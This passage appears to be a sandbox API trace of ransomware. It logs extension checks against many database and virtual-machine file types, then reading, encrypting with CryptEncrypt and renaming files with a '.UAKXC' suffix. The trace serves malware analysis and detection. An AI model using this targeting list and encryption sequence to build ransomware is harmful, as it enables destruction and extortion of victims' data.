lpSrch=".ihx") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".itdb") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".itw") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".jet") returned 0x0 [0146.965] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".jtx") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".kdb") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".kexi") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".kexic") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".kexis") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".lgc") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".lwx") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".maf") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".maq") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".mar") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".mas") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".mav") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".mdb") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".mdf") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".mpd") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".mrg") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".mud") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".mwb") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".myd") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".ndf") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".nnt") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".nrmlib") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".ns2") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".ns3") returned 0x0 [0146.966] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".ns4") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".nsf") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".nv") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".nv2") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".nwdb") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".nyf") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".odb") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".oqy") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".orx") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".owc") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".p96") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".p97") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".pan") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".pdb") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".pdm") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".pnz") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".qry") returned 0x0 [0146.967] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".qvd") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".rbf") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".rctd") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".rod") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".rodx") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".rpd") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".rsd") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".sas7bdat") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".sbf") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".scx") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".sdb") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".sdc") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".sdf") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".sis") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".spq") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".sql") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".sqlite") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".sqlite3") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".sqlitedb") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".te") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".temx") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".tmd") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".tps") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".trc") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".trm") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".udb") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".udl") returned 0x0 [0146.978] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".usr") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".v12") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vis") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vpd") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vvv") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".wdb") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".wmdb") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".wrk") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".xdb") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".xld") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".xmlff") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".abcddb") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".abs") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".abx") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".accdw") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".adn") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".db2") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".fm5") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".hjt") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".icg") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".icr") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".kdb") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".lut") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".maw") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".mdn") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".mdt") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vdi") returned 0x0 [0146.979] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vhd") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vmdk") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".pvm") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vmem") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vmsn") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vmsd") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".nvram") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vmx") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".raw") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".qcow2") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".subvol") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".bin") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vsv") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".avhd") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vmrs") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vhdx") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".avdx") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".vmcx") returned 0x0 [0146.980] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".iso") returned 0x0 [0146.980] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.980] WriteFile (in: hFile=0x714, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0146.981] WriteFile (in: hFile=0x714, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0146.981] SetEndOfFile (hFile=0x714) returned 1 [0146.982] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.982] ReadFile (in: hFile=0x714, lpBuffer=0x4610000, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x10000, lpOverlapped=0x0) returned 1 [0147.569] SetFilePointerEx (in: hFile=0x714, liDistanceToMove=0xffff0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.569] WriteFile (in: hFile=0x714, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x10000, lpOverlapped=0x0) returned 1 [0147.569] CloseHandle (hObject=0x714) returned 1 [0147.571] GetProcessHeap () returned 0xea0000 [0147.571] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0147.571] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0147.571] lstrcatW (in: lpString1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".UAKXC" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.UAKXC") returned="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.UAKXC" [0147.571] MoveFileW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.UAKXC" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.uakxc")) returned 1 [0147.572] GetProcessHeap () returned 0xea0000 [0147.572] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0147.573] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef07c8 | out: hHeap=0xea0000) returned 1 [0147.573] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2d80 | out: hHeap=0xea0000) returned 1 [0147.573] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0147.573] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0147.573] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0147.574] GetFileAttributesW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms")) returned 0x26 [0147.574] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x714 [0147.574] GetLastError () returned 0x0 [0147.574] GetFileSizeEx (in: hFile=0x714, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=524288) returned 1 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".4dd") returned 0x0 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".4dl") returned 0x0 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".accdb") returned 0x0 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".accdc") returned 0x0 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".accde") returned 0x0 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".accdr") returned 0x0 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".accdt") returned 0x0 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".accft") returned 0x0 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".adb") returned 0x0 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".ade") returned 0x0 [0147.575] StrStrIW (lpFirst="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".adf") returned 0x0 [0147.575] StrStrIW 